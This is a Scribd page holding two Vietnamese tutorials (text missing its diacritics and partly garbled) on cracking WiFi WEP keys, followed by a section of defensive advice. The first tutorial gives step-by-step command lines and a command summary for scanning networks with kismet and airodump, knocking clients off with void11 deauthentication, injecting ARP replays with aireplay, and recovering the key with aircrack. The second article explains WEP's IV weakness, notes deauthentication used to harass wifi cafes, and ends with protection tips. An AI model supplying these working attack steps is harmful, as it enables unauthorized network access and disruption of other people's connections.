Scribd Logo
Upload

Welcome to Scribd!

  • Ky Thuat Do Khoa WEP Cua Mang WiFi Step by Step

    Uploaded by

    uk_gemini865745
    373 views20 pages

    Original Title

    18364104 Ky Thuat Do Khoa WEP Cua Mang WiFi Step by Step

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    373 views20 pages

    Ky Thuat Do Khoa WEP Cua Mang WiFi Step by Step

    Uploaded by

    uk_gemini865745

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 20

    K thut d kha WEP ca mng WiFi step by step

    Thursday, 22. May 2008, 08:14:00 Hack Hng trm v c th l hng nghn bi bo vit v cch tn cng WEP, nhng c bao nhiu ngi thc s c th crack c WEP, nhng beginner thng nn lng vi nhng comand ca n v nhng loi card yu cu v nhng iu phc tp hn l khng wen vi mi trng linux. Trong phn ny chng ti s hng dn tng bc cch hack WEP. Bi c u tin s gip cc bn xy dng mt m hnh m phng v hng dn lt qua nhng phn ca crack WEP, vic tip cn mt cch tiu chun ha v a dng m bn c th tp trung vo nhng cng c crack WEP m khng b cn tr bi nhng li hardware hay software. Ton b qu trnh c lm vi nhng software c sn v khng yu cu nhng hardware c bit ch mt vi ci laptop vi my ci card wireless l . Bi u tin s gip bn build mt ci lab v hng dn scanport ca crac wep, sau ht, cc bn cn kim mt ci document tm hiu trc khi c th crack n Bi hai s m t cch kch hot thng access point to ra traffic v qu trnh s l d liu sau khi capture, sau hai bi ny bn c th crack c wep key ri . Bi ba s gip chng ta cc skill bo mt nhm chng li s xm nhp vo wireless. Mc d WEP crack c th lm c trn cng mt laptop nhng l tng nht l bn nn lm trn hai my, mt my thc hin tn cng kch thch lung data lng data bt c trong mt thi gian ngn, trong khi my kia s sniff hoc capture lung data do my u to ra. Tht ra bn c th s dng trn mt my vi mt wireless card, nhng tui khuyn iu ny khng nn ti thi im mi bt u, n thng bt gp nhng nhm ln trong nhng vic bn ang lm, v tui nhn ra rng nhng chng trnh audit thng hay gp mt cht khng n nh khi dng cch ny.

    ch rng dng mt ci active attack v mt ci passive capture s lm tng c hi thnh cng hn, v tng tc qu trnh crack bng cch n s gip sinh ra nhiu packet hn l mi trng bnh thng. v y l danh sch hardware cn thit c trong lab ca chng ta:

    wireless accesspoint: s l ch ngm ca chng ta..hehe..loi no cng c mt laptop vi mt card wireless c th s dng c: y s l my target v khng quan trng ci chipset ca thng wireless card. V n l my tha m..hhihih hai laptop c card wireless c chipset PRISM 2: mt vi chng trnh chng hn nh kismet c th h tr a dng cc loi wireless card, nhng tui khuyn l nn dng card c chipset c ni nh trn, bn c th s dng nhng loi external c antennaes th cng good, nhng khng c cng chng sao( its up to you). Trong khi crack WEP key phi c nhng tool hack ch..hihihiti y th cc bn tm trn mng nha Auditor security collection CD, hay ra my shop bn software tm nha hoc xi thng BACK TRACK y l phin bn mi ca thng trn, link down ftp://mirror.switch.ch/mirror/backtrack/bt2final.iso Vic set up ng nh lab ca chng ta th rt l quan trng, bi v bn mun iu khin c mi trng bn lm vic, bn cng nn ngh ti vic ngn accident khng th lng trc c ti nhng access point ca hng xm ch ng khng no, bi vi trong phn hai mt vi attack ca chng ta c th kick off my thng client ca access point hahah nguy him tht, mun i tip ch? Bc u tin l phi config ci lab , mt target access point v ci thng laptop d tha mnh ni trn, ci access point c cu hnh security vi WEP key m chng ta s crack, security 64 bit, v nh t SSID. Bn nn note li nhng ci bn va cu hnh sau ny cn i chng ch: MAC address ca ACP SSID CHANEL KEY Sau config thng laptop d tha, kt ni bnh thng ti thng accesspoint,nh ng nhp c key ng hong nha. Sau ghi li ci MAC ca thng d tha ny. Ti y th mng WLAN ca mnh c config By gi shutdown thng d tha c ri: n y chc mnh phi nh ngha cho tng thng laptop thui,s cc bn b nhm ln m Mng lab: WLAN Thng d tha: target computer laptopA: laptop B accesspoint: target ACP OK vo vic no: (i tip khng)( sc th i khng th ng ua nha)hiihiih n lc config laptopA v B m scan WLAN v sniff traffic tn cng ly lung traffic Trc tin l cho ci disk hack vo boot from cd (ko bt cc bn c bt lm ko nh) vo cmos chn first l cd, nh l gn card wireless vo nha Sau khi iu chnh phn gii thch hp t auditor boot menu n s ci vo RAM V bn s mn hnh nh th ny y:

    hai biu tng quan trng s l program v commandline pha di bn tri mn hnh

    trc khi tip tc lm bn nn chc rng wirelesscard gn vo ng v c config bng auditor: click vo biu tng command line ri wunh n.hihiihih IWCONFIG

    Trong s nhng thng tin m auditor x ra hy ch thng s wlan0 vy l card c chipset PRISM based card v auditor detect c card mng ca bn ri , bn c th cu hnh tng t vi laptopB, xong ri shutdown hihiihiiihi, v bn s khng cn n cho n phn hai, ni m bn s hc lm sao kick data ci traffic v s capture bng laptopA. bt u dng kismet ri ( chin u thui) y l cng c hu ch detect WLAN, ACP N cng capture traffic nhng c mt chng trnh hay hn l airodump mt phn ca aircrack,

    cng c rt tt trong cng vic crack WEP cho nn chng ta s dng v chc rng card wireless ang lm hot ng scan wireless v capture traffic. Vo program icon, sau auditor- wireless scanner analyzer v cui cng l kismet

    Thm vo scan mng wireless, kismet s capture d liu vo mt file sau ny phn tch, cho nn kismet yu cu ni lu file c capture, click vo desktop v sau ok

    Kismet cng yu cu mt ci prefix cho file c capture, thay tn mc nh bng capture.

    Khi kismet hot ng n s lit k tt c cc mng wireless trong mt range, bao gm c target ACP bn setup, channel ( ging knh o h),di ct CH column, nhng ci m bn ghi lc ny , check li xem ging ko?. Nu kismet lit k nhiu ACP gn ci lab ca bn, th nn chuyn ci lab y ra xa ci ACP ca ngi ta mt t (ng ti ko mang ho..hihihi).

    Trong khi kismet dang hot ng bn s thy s packet ang thay i cho tt c cc ACP bn phi mn hnh. Kismet hin ra tng s network c tm thy, s packet c capture v tng s packet c encrypted, thm ch c nhng target computer tt ngm i ri, th n cng c show ra nhng packet t ACP ( v c khong vi giy thng ACP s pht ra n bo hiu v ni ( ly ng tui bi nyheheh). Kismet hot ng trong ch autofit nn s khng lit k y cc ACP theo th t ca n, nhn S sort, y bn c th xc nh th t sort, n s d nhn hn khi ta sort n. Nhn C th ACP s theo channel

    Kismet mc nh s nhy channel t 1 ti 11( hiphophihi) dng tr chut di chuyn highlight ti SSID ca bn v nhn L kissmet s kho ci channel ca SSID ,

    bn s ch rng s packet ca nhng ACP c th vn tip tc tng, iu ny l bi v cc channel s gi ln nhau theo th t.

    By gi mt iu hp l l chng ta bit kissmet ang hot ng, chng ta s xem iu g s din ra khi my target computer trn mng bt u trao chuyn thng tin,bt u kt ni thng d tha vo mng trong khi vn scan kismet, khi thng d tha boot vo window v kt ni vi ACP bn ch rng mt lng d liu c m ho nhanh chng c kissmet capture, bn s dng nhng gi ny attack trong phn hai. Ti thi im ny bn bit cch c bn tip cn vi crack WEP, 1 ACP, 2 laptop sniff v attack ang hot ng, v cng wen vi vic tm ng vo ca software trong disk auditor, dng kismet tm ra range wireless. Phn hai chng ta s dng laptop B kick ci WLAN sinh ra traffic v chng ta s capture v thc s crack. Cho n khi bn thc s quen vi vic dng kismet, ti WLAN v khm ph vi cng c khc c trong disk auditor. Phn hai: phn mt chng ta ch ra cch basic crack wep, config wlan v hai laptop sniff v attack. Trong phn ny chng ti s hng dn lm sao dng thm nhng cng c c trong auditor cd capture traffic v dng n crack wep, chng ti cng hng dn lm sao deauthentication ( chng thc li) v packetreplay kick WLAN sinh ra traffic l mt yu t chnh tit kim thi gian crack Tuy nhin trc khi bt u, chng ta hy lm mt vi im cn ch m c th tit kim thi gian v kh nng s dng nhng chng trnh s dng thnh cng, bn cn c nhng cn bn v thut ng network v nhng yu t cn bn, bn cng nn bit cch ping mng, open command prompt v nhp nhng command, cn bn v linux th cng tt. Nhng quy tc yu cu v hardware c bn v phn 1 Mt mng WLAN v mt thng d tha kt ni vi ACP V iu quan trng trong m hnh lab ny l khng c truy cp vo nhng ACP ca ngi khc m khng c s ng ca ch Cng ch l iu ny c th thc hin trn ch mt laptop khng nht thit l hai my, nhng cho r rng v trnh nhm ln chng ta nn s dng hai my laptop. 4 tool chnh dng trong phn ny l AIRODUMP, VOID11,AIRREPLAY V AIRCRACK u c trn disk auditor. AIRODUMP : scan mng wireless v capture packet vo mt ni no VOID11: s deauthenticatiom ( chng thc li) computer t ACP , s p t cho chng kt ni li vi ACP, to ARP request ( ly MAC) AIRREPLAY: tm ci ARP request ri gi li ti thng ACP AIRCRACK: s ly nhng file capture c to ra bi AIRODUMP phn1: bn s dng kismet ly nhng thng tin, by gi hy ghi ra giy nh sau ny cn xi. MAC ca ACP

    MAC ca thng d tha CHANNEL ang s dng ca ACP WEP KEY c set up trong ACP Trong i thc mt vi ngi mun break vo trong mng wireless thng thng ly nhng thng tin ( MAC ca ACP , channel ca ACP, v target computer) Nhng iu ny gi l zero knowledge, nu nh k tn cng c tt c cc thng tin cn thit iu c gi l cuc tn cng full knowledge lc khng cn g l thch thc i vi h, chng ta c cho rng chng ta khng bt g ht v m t lm sao ly nhng thng tin cn thit. Tm MAC ca ACP th khng c g kh i vi chng ta vi vic xi thng kismet, hy lm tng t nh phn mt ti hng dn, ly c SSID, MAC, v CHANNEL ca ACP, vy l nhng zero knowledge c chuyn qua tt c cc thng tin cn thit chy crack WEP

    c vi trng hp ngi ta s dng giu ci SSID khng cho broadcash ra ngoi nhm mc ch ngn chn mt s phn mm nhng i vi kismet th ng c nm m, n s lit k tt c nhng thng tin m n capture c. Tm MAC ca client: Chng ta cn mt thng tin cui cng bt u qu trnh crack, MAC ca client kt ni vi ACP, quay lai kismet nhn Q quay li menu chnh, sau nhn shift + C lit k danh sch MAC ca client, MAC s c lit k bn khung bn tri

    Nu nh bn khng thy MAC ca client th phi chc rng ci thng d tha kt ni ti ACP, nu nh khng c th khng th thc hin cc bc tip theo, v lab ca chng ta cn c mt client kt ni ti ACP. Capture d liu vi AIRODUMP Khng cn nhc n tc kinh khng ca n, nhng cng cn phi c packet lm vic trong qu trnh crack WEP, n c tc dng capture packet vo mt file sau ny phc v cho AIRCRACK, chng ta hy xem chng hot dng nh th no nh. Bn c th s dng laptop no cng c c, nhng trong lab ny chng ta s dng laptopA, M airodump v g vo command sau: Commands for setting up airodump iwconfig wlan0 mode monitor iwconfig wlan0 channel THECHANNELNUM cd /ramdisk airodump wlan0 cap Hy lu rng thay THECHANNELNUM=S CHANNEL m ACP bn ang xi /ramdisk l ni data b capture lu nu nh gn ni bn c cc ACP khc nhng nu bn mun audit ci ACP ca bn, hy thm dng lnh nh sau cui command trn airodump wlan0 cap1 MACADDRESSOFAP iu ny s hng dn AIRODUMP ch lu nhng packet ca target ACP bn c th exit AIRODUMP bng cch nhn ctrl + C v nhn ls l s lit k ra cc file c lu v ch phn ui file l .cab nu capture thnh cng n s ch vi kb thi phn Ivs:

    Trong khi AIRODUMP ang chy, bn s thy MAC ca ACP c lit ra BSSID phn bn tri, bn cng thy packet count v Ivs count tng ln, y l iu thng din ra trong bt k traffic no thm ch c khi bn khng ang lt web v nu nh bn duyt web hay email trn target computer th bn s thy mc IVs tng ln, IVs l quan trng nht n quyt nh bn c th crack c hay khng, thng thng th thng s IVs trong khong 50.000 ti 200.000 cho 64bit v 200.000 ti 700.000 cho 128 bit. Bn cng phi ch rng ch traffic bnh thng th IVs khng tng nhanh n c th mt mt gi hay thm ch c ngy capture d liu cho vic crack thnh cng, nhng may thay chng ta c mt cng c gip ta lm tng tc ny Cch nhanh nht sinh ra nhiu packet l kick cho thng WLAN lun ch busy, chng ta c th th bng cch download file hoc ping t thng target ti mt a ch no Vd: ping t l 5000 (ip no ) V ti y th VOID11 bt u vo cuc: VOID11 c dng deauthenticate gia target computer vi ACP, to ra traffic, target computer s b kick off ra khi mng v t ng kt ni li vi ACP, trong qu trnh kt ni li th traffic s c sinh ra m capture

    Bt u vi laptopB vi auditor cd c cho vo,sau m shell v nh vo lnh sau: Commands for setting up a void11 deauth attack switch-to-hostap cardctl eject cardctl insert iwconfig wlan0 channel THECHANNELNUM iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0 Ch thay THECHANNELNUM = knh ang hot ng trn ACP MACOFSTATION l MAC ca target client v MACOFAP l MAC ca ACP Trong qu trnh chy c th VOID11 bo mt thng bo li nhng bn ng bn tm ( khng n nhm g ti ho bnh th gii c) Trong khi laptopB ang chy th chng ta hy xem iu g s xy ra trn my target computer nha, mng s t t chm xung thm ch ngng hn, v vi giy sau s b ngt lun ra khi mng ( c qu ha) Bn c th kim tra iu ny bng cch vn tip tc ping ti t target ti ACP y l trc khi chy VOID11 trn my laptopB

    V trong khi chy VOID11,nu bn stop VOID11 th ping s tr li bnh thng

    V bn c th check mt cch c th trn property ca card mng wireless trn target

    V bn hy ch trn laptopA s IVs tng ln rt nhanh trong vi giy t 100 200, iu ny xy ra l v qu trnh kt ni li ca target v ACP Packet repaly da vo AIRREPALY Trong khi deauthentiace sinh ra traffic, n thng khng tng tc qu trnh lm cho IVs ca chng ta tng nhanh, tng hu hiu to ra traffic chng ta s dng ti mt cng c l replay attack, replay attack hot ng da vo packet bt c do target sinh ra, sau la client l n nhn c packet v lp li packet mt cch thng xuyn hn bnh thng. Stop deauthenticate attack sau m AIRREPLAY ln s dng nhng capture file, l nhng ARP request

    Chng ta hy bt u vi tnh trng clean, ngha l restar hai laptop A,B. v hy ch rng laptopA ch chy AIRREPLAY vi mc ch kick traffic mng v IVs nhm tit kim thi gian crack v laptopB ang s dng AIRODUMP, hay VOID11 v ang s dng AIRCRACK phc v cho vic crack da vo nhng packet thu lm c

    Trc tin chng ta hy khi ng AIREPLAY trn my laptopA v nhp vo cc command sau: Commands to set up aireplay to listen for an ARP packet switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff Ch switch-to-wlanng v monitor .wlan l nhng ci c tch hp sn trong disk n gin ho khi nhp command thay th THECHANNELNUM = s channel m bn tm thy c trong cc bc trc v MACADDRESSOFAP = MAC ca ACP no by gi ti my target computer bt n ln kt ni vi ACP sau sang my laptopB bt VOID11 v quan st, ta s thy rng tn hiu mng ca client t t gim xung v c khi mt hn, v bn cng thy rng AIREPLAY tng ln rt nhanh, thnh thong AIREPLAY thng bo mt packet tm c v hi bn c mun replay n khng

    Bn s mun mt packet match nhng tiu chun sau: FromDS - 0 ToDS - 1 BSSID - MAC Address of the Target AP Source MAC - MAC Address of the Target computer Destination MAC - FF:FF:FF:FF:FF:FF Nhn ch n cho s khng ng v AIREPLAY s resume li v y xc nhn nu match nhng tiu chun trn AIREPLAY s chuyn t ch capture sang ch replay, ngay lp tc quay tr li laptopB v stop VOID11 Capture packet da vo deauthenticate c xem l phn gian xo nht trong phn crack. Trong khi n to ra traffic, nng n to ra khng c nhiu lm trong qu trnh client reconnect ti ACP, capture c th phc tp hn tu thuc vo driver ca card v h iu hnh ca client , VOID11 c th d dng p o thng client bng vi mt deauthen packet thm ch khng c thi gian reconnect li. Thnh thong bn c th may mn t nhng packet u nhng thnh thong bn cng phi i cho ti packet cn match Trong command ca AIREPLAY mt tham s -d cho ch delay Ti thi im ny th laptopA ang chy AIREPLAY c s IVs tm cho chng ta thc hin vic cracking, stop VOID11 trn my laptop B v bt AIRODUMP ln, nh vo nhng command sau: Starting up airodump after stopping void11 switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk airodump wlan0 cap1

    chc cc bn cng bit lm nh th no ri ng khng, ch c dng cui nu trong mng bn c nhiu mng wireless th bn hy g mt command ti cui dng l airodump wlan0 cap1 MACADDRESSOFAP chc lnh trn bn cng hiu phi khng no , mnh gii thch nhiu ri m sau khi AIRODUMP khi ng bn s thy IVs tng ln rt nhanh khong 200 /s, cm n AIREPLAY trn laptopA trong khi AIRODUMP ang write IVs vo file ta hy bt u qu trnh chy AIRCRACK, ta c th cho chy song song, m AIRCRACK v nhp command sau : Starting aircrack cd /ramdisk aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.caplu FUDGEFACTOR l mt s nguyn v mc nh l 2 MACADDRESSOFAP = MAC ca ACP WEPKEYLENGTH c chc cc bn cng hiu l chiu di bit ca WEBKEY thng thng l 64 v 128

    bn c th thay s 2 bng mt s no ln hn nhng s lm qu trnh chm hn, nhng c kt qu chc hn, n s give up nu nh khng tm thy 64 bit format bn c th nhn ctrl + C stop v up arrow resart li lnh va ri ca AIRCRACK, n s update packet v tham s -p cho qu trnh multi process, thnh thong bn s c mn hnh nh sau:

    chng ta hon tt qu trnh crack WEPKEY vi 64bit ch trong vng cha ti 5 pht bao gm qu trnh scan v crack vi AIRCRACK v kick traffic vi AIREPLAY ang chy, i khi bn c th crack khi IVs ln n 25000 nhng hu ht l nn trn 100000 v 128 bit th cn hn na khong t 150000 n 700000, c nhiu IVs th cng good cho vic crack, iu quan trng l bn phi in vo lenghkey m bn mun crack v khng c cng c no cung cp iu trong disk ny, nn bn nn th c hai 64 v 128

    V y l lenghkey 128 bit. Bn cng nn c mt my c cu hnh mnh c cpu v mt lng kh v RAM, bn cng c th tch ring qu trnh s l bng cch lu file capture vo mt my khc my khng cn phi kt ni vo mng ch cn chy AIRCRACK s l nhng packet m AIRODUMP lm v, hoc c th lu trn thit b USB, ch vic m command len v nhp command sau: Saving capture files to USB flash drive mkdir /mnt/usb mount -t vfat /dev/uba1 /mnt/usb copy /ramdisk/cap*.cap /mnt/usb umount /mnt/usb Kt lun: bo mt bng wepkey khng phi l phuong php tt, wired equivalent privacy, chng ta nn s sng ch bo mt cao hn l WPA2 WIFI PROTEC ACCESS version2 sau y l summary commad: Commands for setting up airodump iwconfig wlan0 mode monitor iwconfig wlan0 channel THECHANNELNUM cd /ramdisk airodump wlan0 cap Commands for setting up a void11 deauth attack switch-to-hostap cardctl eject cardctl insert iwconfig wlan0 channel THECHANNELNUM iwpriv wlan0 hostapd 1 iwconfig wlan0 mode master

    void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0 Commands to set up aireplay to listen for an ARP packet switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff Starting up airodump after stopping void11 switch-to-wlanng cardctl eject cardctl insert monitor.wlan wlan0 THECHANNELNUM cd /ramdisk airodump wlan0 cap1 Starting aircrack cd /ramdisk aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

    D kha WEP ca mng WiFi v cch bo v Friday, 20 June 2008 04:08 Hin nay cng ngh mng ko dy wifi kh ph bin, c nhiu ni s dng v tnh tin dng ca n, nhng bn cnh vn bo mt cho wifi cng gy nhc u cho ko t ngi, nht l ngi dng gia nh & ko chuyn. Bi vit ny ti xin cp n kh nng d kho m ho WEP (wep key) ca wifi v cc gii php phng chng. Gii thiu chung v wifi v WEP. WIFI WIreless FIdelity ( thut ng ny hin gi vn cn ang gy tranh ci v n chng c ngha g c) l mt b giao thc cho thit b ko dy da trn chun 802.11x bao gm cc Access Point v cc thit b u cui ko dy nh pc card, usb card, wifi PDA kt ni vi nhau. Wifi s dng nhiu chun m ho khc nhau nhm bo v trnh s truy cp tri php, v tnh c th ca kt ni ko dy l ko th gii hn v mt vt l truy cp n ng truyn, bt c ai trong vng ph sng u c th truy cp c, nn m ho l iu cn thit i vi ngi s dng cn s ring t, an ton. Wifi hin nay c 3 kiu m ho chnh gm: WEP-Wired Equivalent Privacy , WPA-Wireless Protected Access v WPA2. WEP l kiu m ho ra i sm nht v c h tr ph bin nht bi cc nh sx thit b wifi, a s thit b wifi u h tr wep s dng kho m ho di t 40-128 bits. Gn y nhiu ngi pht hin ra im yu trong phng thc m ho wep v a ra rt nhiu cng c crack. Tuy nhin cng ko th t b WEP ngay c v n c s dng ph bin t lu, ko phi nh sx thit b no cng kp chuyn sang h tr cc kiu m ho khc vi cc thit b m h sx Vy im yu ca WEP l u ? Do wep s dng phng thc m ho dng (stream cipher), n cn 1 c ch m bo hai gi tin-packet ging nhau sau khi c m ho s cho ra kt qu ko ging nhau nhm trnh s suy on ca hacker. Nhm t mc tiu trn, mt gi tr c tn IV (Initialization Vector) c s dng cng thm vi kho ca ta a vo, to ra kho khc nhau sau mi ln m ho d liu. IV l gi tr c di 24 bit c thay i ngu nhin theo tng gi d liu, v vy thc t wep key chng ta c ch nh ch cn 40bits vi kiu m ho 64bits v 104bit vi kiu 128bit trong cc AP(access point), v 24bit c dnh cho vic to cc IV ny(cc bn th xem, khi nhp mt m trong AP nu chn m ho 64bit ta ch c th nhp c 5 k t nu chn mt m kiu string, hay 10 k t nu chn kiu hexa, tng ng vi 40bit). Do khi thit b gi to ra IV 1 cch ngu nhin nn bt buc phi c gi n thit b nhn dng ko m ho trong header ca gi tin, thit b nhn s s dng IV & kho gii m phn cn li ca gi d liu. IV chnh l im yu trong m hnh m ho WEP, v di ca IV l 24bits nn gi tr ca IV khong hn 16 triu trng hp, nu cracker bt gi 1 s lng packet no th hon ton c th phn tch cc IV ny on ra kho-key m nn nhn ang s dng. Phn tip sau y ti s m t m hnh mng wifi th nghim v cch thc d ra kho m. M hnh th nghim v cch d. M hnh th nghim ti gi lp l 1 mng wifi ging thc t bao gm 1 AP hiu DLink DI524 & 1 my tnh c card wifi, c gi l AP & client mc tiu, s dng kiu m ha WEP 64bits vi mt khu l 1a2b3c4d5e dng hex (xem hnh 1).

    Hnh 1: Giao din Setup ca AP th nghim. Cng c crack ti dng bao gm b chng trnh phn mm Aircrack 2.4 chy trn linux, netstumbler, kismet, a live cd linux, 1 my laptop c 2 card wifi adapter hoc 2 my tnh mi my 1 card tng thch vi aircrack. Nh ngi ta thng ni: bit ngi bit ta trm trn trm thng, crack mng wifi mc tiu, u tin ta phi bit r mi thng tin v mc tiu nh chnh ch nhn ca n vy (tt nhin ch c kha m l cha bit thi. Th nhng thng tin cn bit l g ?, l : - SSID hoc ESSID (Service Set IDentifier -hiu nm na l tn nhn din ca mng, ging nh tn workgroup ca mng LAN ngang hng vy), m hnh th nghim ny ti t tn l thunghiem. - Knh channel ca mng, y ti l knh 11. - Kiu m ha, y l WEP 64 bit. - a ch MAC address ca AP & MAC card ca my mc tiu. Vy dng ci g thu thp nhng thng tin ny ?. l dng NetStumbler (xem hnh 2) chy trn windows hoc Kismet trn linux, netstumbler ko xem c MAC ca client mc tiu nn ta dng kismet or chng trnh airodump trong b cng c aircrack thu thp.

    Hnh 2: Dng netstumbler thu thp thng tin. Sau khi thu thp thng tin v mc tiu, ta tin hnh s dng b aircrack. Aircrack l b cng c ngun m chy trn linux dng d tm kha m WEP/WPA rt mnh c pht trin bi Christophe Devine, c rt nhiu cng c tng t nhng aircrack c a thch hn c v mnh & d dng, tuy nhin n cng h tr kh t loi chipset wifi. B aircrack c 3 cng c chnh ta s dng l: - aireplay dng bm-injection lm pht sinh thm d liu lu thng trong mng mc tiu, i vi nhng mng c qu t d liu lu thng mng ta phi dng n lm gim thi gian ch i bt gi s packet phc v cho vic d tm kha. (hnh v d 3)

    Hnh 3: deauth client, gi dng ARP & bm d liu tng lu thng mng - airodump dng monitor v capture-bt gi packet m AP pht ra, lu li thnh file capture.(hnh 4)

    Hnh 4: bt cc gi d liu, di ct station l a ch MAC ca client- aircrack dng c file capture v d tm kha.(hnh 5)

    Hnh 5: d tm kha bng aircrack, ch c 1s l ra !!! Ti s ko ghi c th cc dng lnh & tham s ra y v ta c th dng tham s help h bit c php c th. Nhng u tin ta phi a 2 card wifi ca chng ta qua ch monitor mode, xem help ca lnh ifconfig & iwconfig bit cch lm. V mng th nghim ca ti c qu t lu thng mng nn ti s dng aireplay bm cc gi tin ti AP. i khi cch hot ng ca aireplay l gi cc gi tin deauthentication n AP lm cho AP mt kt ni, client ra khi mng (nhiu ngi thng dng cch ny quy ph my qun caf wifi), client s phi gi cc yu cu ARP request kt ni li vi AP. Sau ta chy aireplay vi tham s khc cng vi /c MAC ca client bit gi dng gi cc ARP request ny lin tc ti AP, lm cho AP tr li cc yu cu ny. Trong lc chy aireplay, ta chy airodump bt gi cc gi tin tr li t AP c cha IV (lu aireplay & airodump phi chy trn 2 card khc nhau, ko c cng 1 card). Sau khi chy airodump, theo di mn hnh ta s thy s IV ct #Data s tng nhanh chng cng vi s tng packet ct Beacons nu ta chy aireplay bm d liu. Ti liu c ni rng phi cn bt khong di 500 ngn IV gii m kha 64bit & t 500 ngn IV tr ln gii m kha 128bit, thc t y ti ch cn hn 300k IV l thnh cng. Khi thy airodump capture c kha kh, ta c n chy tip v m 1 ca s console khc v chy aircrack c cc IV t file m airodump lu d tm kha, tin trnh ny rt nhanh thng ko mt qu 5s vi my P4 Mobile ca ti. Tng thi gian bm d liu & d tm kha ko qu 1 ting, kh n tng phi ko ?!. Ngoi ra cng c ny cn c th d c c kha m ha bng WPA, 1 phng thc an ton v mnh hn WEP nhiu. Do thi gian c hn nn ti ko trnh by trong bi vit ny. Cc phng php bo mt cho mng WiFi. Phn ny ti s trnh by cc cch bo mt cho mng wifi, phn tch cc mt u nhc ca tng cch, t cch n gin n phc tp, tuy nhin ai cng c th t lm c ht. Chng ta c th p dng ring l tng cch hay kt hp nhiu cch li u c. - Tt access point: khi xi xong or ko c nhu cu s dng mng na th ta c th tt in n i. Cch ny nghe c v cc oan & bun ci nhng li l cch hiu qu 100%. - Tt ch SSID Broadcast: a s cc AP u cho php ta tt ch ny, n lm cho tin ch wireless zero config trong winxp or cc ct scan wifi nh netstumble ko nhn thy c mng ca chng ta. Tuy

    vy n cng ko ngn c 1 s ct scan mnh khc nh Kismet - Lc a ch MAC: AP u c tnh nng lc MAC ca cc client kt ni vo, c 2 cch lc l ch cho php v ch cm /c MAC no . Cch ny vn ko ngn c nhng cao th tm cch bit c /c MAC cc client trong mng ca ta & d dng gi dng chng thng qua thay i /c MAC ca card mng wifi. - M ha: WEP, WPA/WPA2 l nhng kiu m ha thng dng trong cc AP, nu AP ca bn ch h tr WEP th hy xi key di nht c th (thng l 128bit), nu c h tr WPA th xi key ti thiu 128bit or 256bit. a phn cc AP c support WPA u xi kiu WPA-PSK (pre-shared key hoc passphare key), WPA2 m ha th an ton hn na nhng phi cn thm 1 server Radius nhm mc ch xc thc. Chng ta nn t kha cng phc tp cng tt(bao gm k t hoa thng, s & k t c bit kt hp li), ko nn dng nhng t c ngha hay c trong t in, v cracker vn d c m kha WPA khi dng t in d theo kiu brute force attack. Dng cch ny s lm gim tc ng truyn gia AP & client v cc thit b s mt nhiu nng lc gii/m ha kiu phc tp ny. - Dng cc kiu xc thc ngi dng, tng la, m ha d liu trn a & tp tin: cc cch ny s ko ngn c ngi khc d ra kha m ha wep/wpa. Nhng n ngn h ko xem cng nh can thip v c nhng d liu ang lu thng & ti nguyn trn mng ca chng ta. Li kt. Qua bi vit ny, chng ta thy 1 cch tng i tng qut v vn bo mt ca mng ko dy hin nay. Chng ta ko th t b hon ton c WEP v hin gi rt nhiu thit b wifi h tr tt cho n. N cng bc l kh nhiu im yu d b khai thc. Nhng cng ko phi l thm ha g nu chng ta bit cch s dng kt hp 1 vi cch phng th ph hp cho mng wifi ca chng ta. Vi bi vit ny ti mun gip mi ngi hiu thm v bo mt mng wifi. Ti s ko chu trch nhim v bt c iu g xy ra nu c ai s dng nhng thng tin trong bi ny vo mc ch ko tt khc, cng nh s ko tr li bt c cu hi no lin quan ti d tm key.

    You might also like